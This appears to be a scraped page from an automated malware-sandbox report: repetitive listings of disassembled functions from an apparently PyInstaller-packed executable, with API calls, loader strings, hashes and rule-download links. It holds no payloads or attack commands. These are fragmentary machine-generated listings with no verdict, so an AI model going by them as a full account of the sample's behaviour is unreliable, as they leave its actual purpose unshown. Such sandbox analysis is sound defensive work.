                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3140674995-0
                                                                                                                                                                                                                                                            • Opcode ID: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                                                                                                                                                                                                            • Instruction ID: 3ec315774e2e966e507582b769b1e8d3e34b39d51ed6993d7d51d750dfd109b8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CC314C7661CB9296EB64EF60E8903EE7360FB85748F04443ADA4E87B99DF38D548C710
                                                                                                                                                                                                                                                            Function 00007FF640504F10 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF640504F55
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6405048A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6405048BC
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404F9C58: RtlFreeHeap.NTDLL(?,?,?,00007FF640502032,?,?,?,00007FF64050206F,?,?,00000000,00007FF640502535,?,?,?,00007FF640502467), ref: 00007FF6404F9C6E
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404F9C58: GetLastError.KERNEL32(?,?,?,00007FF640502032,?,?,?,00007FF64050206F,?,?,00000000,00007FF640502535,?,?,?,00007FF640502467), ref: 00007FF6404F9C78
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404F9C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6404F9BEF,?,?,?,?,?,00007FF6404F9ADA), ref: 00007FF6404F9C19
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404F9C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6404F9BEF,?,?,?,?,?,00007FF6404F9ADA), ref: 00007FF6404F9C3E
                                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF640504F44
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF640504908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF64050491C
                                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6405051BA
                                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6405051CB
                                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6405051DC
                                                                                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF64050541C), ref: 00007FF640505203
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4070488512-0
                                                                                                                                                                                                                                                            • Opcode ID: 1e88bcb5f495bb70dc88d60703a9f776145871d29d9eb43ad6078281b4d73a6f
                                                                                                                                                                                                                                                            • Instruction ID: 7e4a4c9c830baa433aa96951ff4f0cbac14d7fc1549b2dded7bfed066c782698
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1e88bcb5f495bb70dc88d60703a9f776145871d29d9eb43ad6078281b4d73a6f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E3D1C176E1C262A6E728FF21D6502BE6391EF46788F448035EA6D87786DF3CE841C740
                                                                                                                                                                                                                                                            Function 00007FF6404F9924 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1239891234-0
                                                                                                                                                                                                                                                            • Opcode ID: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                                                                                                                                                                                                                            • Instruction ID: 3891df918236542e21a933cb94d5bbda2276a66832b62c853e2cb9478c37822d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f336cc4ee628281f12481126c86b188c106f14650002c00baa1860decbda2c10
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7231B43661CF9295EB64EF25E8802AE33A4FB89758F540135EA9D83B98DF3CC545CB00
                                                                                                                                                                                                                                                            Function 00007FF640500B84 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2227656907-0
                                                                                                                                                                                                                                                            • Opcode ID: 88c6eeb3815b689bec9e785de6a4435637107cd6a4a104e99c849aa3a7604df1
                                                                                                                                                                                                                                                            • Instruction ID: 37b713b53cc68f08942d79398f14ce3f1865504be49422b01fcfef59d1de5146
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 88c6eeb3815b689bec9e785de6a4435637107cd6a4a104e99c849aa3a7604df1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7BB1D522B1C6A291EA68BB61D6101BD6395FB46BECF446131EE6D97BC5DF3CE841C300
                                                                                                                                                                                                                                                            Function 00007FF64050518C Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6405051BA
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF640504908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF64050491C
                                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6405051CB
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6405048A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6405048BC
                                                                                                                                                                                                                                                            • _get_daylight.LIBCMT ref: 00007FF6405051DC
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6405048D8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6405048EC
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404F9C58: RtlFreeHeap.NTDLL(?,?,?,00007FF640502032,?,?,?,00007FF64050206F,?,?,00000000,00007FF640502535,?,?,?,00007FF640502467), ref: 00007FF6404F9C6E
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404F9C58: GetLastError.KERNEL32(?,?,?,00007FF640502032,?,?,?,00007FF64050206F,?,?,00000000,00007FF640502535,?,?,?,00007FF640502467), ref: 00007FF6404F9C78
                                                                                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF64050541C), ref: 00007FF640505203
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3458911817-0
                                                                                                                                                                                                                                                            • Opcode ID: c5508bc63ced89b7e96ce891f343e42cb1356f84bc391250f2f4d752248c7e40
                                                                                                                                                                                                                                                            • Instruction ID: b58667a0859c4565491414ec19ff1220c40c75b2265e47e50320d6277c7c88b0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5508bc63ced89b7e96ce891f343e42cb1356f84bc391250f2f4d752248c7e40
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8F51A336A0C662A6E718FF21DA811AD6760FF4A788F444539EA2DC7796DF3CE440CB40
                                                                                                                                                                                                                                                            Function 00007FF6404E50B0 Relevance: 157.9, APIs: 44, Strings: 46, Instructions: 364libraryloaderCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF6404E5C57,?,00007FF6404E308E), ref: 00007FF6404E50C0
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF6404E5C57,?,00007FF6404E308E), ref: 00007FF6404E5101
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF6404E5C57,?,00007FF6404E308E), ref: 00007FF6404E5126
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF6404E5C57,?,00007FF6404E308E), ref: 00007FF6404E514B
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF6404E5C57,?,00007FF6404E308E), ref: 00007FF6404E5173
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF6404E5C57,?,00007FF6404E308E), ref: 00007FF6404E519B
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF6404E5C57,?,00007FF6404E308E), ref: 00007FF6404E51C3
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF6404E5C57,?,00007FF6404E308E), ref: 00007FF6404E51EB
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF6404E5C57,?,00007FF6404E308E), ref: 00007FF6404E5213
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AddressProc
                                                                                                                                                                                                                                                            • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                                            • API String ID: 190572456-2007157414
                                                                                                                                                                                                                                                            • Opcode ID: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                                                                                                                                                                                                                            • Instruction ID: 749e0cb1e1f514267acb106d647e8661d968cbb92c6662e071f59433196bb520
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28129B6491EF23F1FA5DFB04AA542B827B0EF06758F945435D82E923A0EF7CB5488781
                                                                                                                                                                                                                                                            Function 00007FF6404E6EA0 Relevance: 119.3, APIs: 33, Strings: 35, Instructions: 280libraryloaderCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AddressProc
                                                                                                                                                                                                                                                            • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                                            • API String ID: 190572456-3427451314
                                                                                                                                                                                                                                                            • Opcode ID: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                                                                                                                                                                                                            • Instruction ID: abbbf6ab425959a4ee5db86c0e07891b53cc1cfff00ffca5121d5a0f11402665
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea7dfca1e90abb6d4d8c6eb1b798acaf406610e772db9aaa2d8df727af0780f5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5DE1766890DB63F0FA5DFB14BA541B833A5EF1A798F845435C82E823A4EF3CA548C351
                                                                                                                                                                                                                                                            Function 00007FF6404E15C0 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 137COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                                                                            • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                                            • API String ID: 2030045667-1550345328
                                                                                                                                                                                                                                                            • Opcode ID: a6afda6375053f9f7c6ea0d4aafbd39b87900b6fab8cbbe9d26c6b4613d1e6e7
                                                                                                                                                                                                                                                            • Instruction ID: dfd4575e4f547f119721587526c5d570a059d85c798b5f96c23ea6539c55306f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a6afda6375053f9f7c6ea0d4aafbd39b87900b6fab8cbbe9d26c6b4613d1e6e7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AC51AD61B0C663F2EA14FB25AA405B923A1FF85B98F444131EE1D87BA5EF7CE5548380
                                                                                                                                                                                                                                                            Function 00007FF6404E77D0 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 115COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404E86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6404E3FA4,00000000,00007FF6404E1925), ref: 00007FF6404E86E9
                                                                                                                                                                                                                                                            • ExpandEnvironmentStringsW.KERNEL32(?,00007FF6404E7C97,?,?,FFFFFFFF,00007FF6404E3834), ref: 00007FF6404E782C
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404E26C0: MessageBoxW.USER32 ref: 00007FF6404E2736
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                                            • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                                            • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                                            • Opcode ID: c3532161b1b2b7c53ec0a0b3f79f5e94743c67efbab5da7731ebfcd00691680a
                                                                                                                                                                                                                                                            • Instruction ID: 506f906f73d081f3596a968a9d7fb226fe389954db74e8cd44959733c381078a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c3532161b1b2b7c53ec0a0b3f79f5e94743c67efbab5da7731ebfcd00691680a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BA41F421B2C663F0FB64FB24E955ABA6261FFA4794F404031DA5EC2796EF7CE1048780
                                                                                                                                                                                                                                                            Function 00007FF6404E20F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                                            • String ID: P%
                                                                                                                                                                                                                                                            • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                                            • Opcode ID: 028f263e58f42d33d872b22938efc015f71aa7b4c996476cfe5add7d8b08dd36
                                                                                                                                                                                                                                                            • Instruction ID: 0bb270964456ae748b4171e7974fb360b430edc69f1fa457c445cd47c0f1082c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 028f263e58f42d33d872b22938efc015f71aa7b4c996476cfe5add7d8b08dd36
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F51E7266187B186D638AF22A4581BAB7A1F798B65F004121EBDE83785DF3CD145CB10
                                                                                                                                                                                                                                                            Function 00007FF6404F55A0 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1981599946.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981561933.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981666255.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981734296.00007FF640523000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1981825972.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
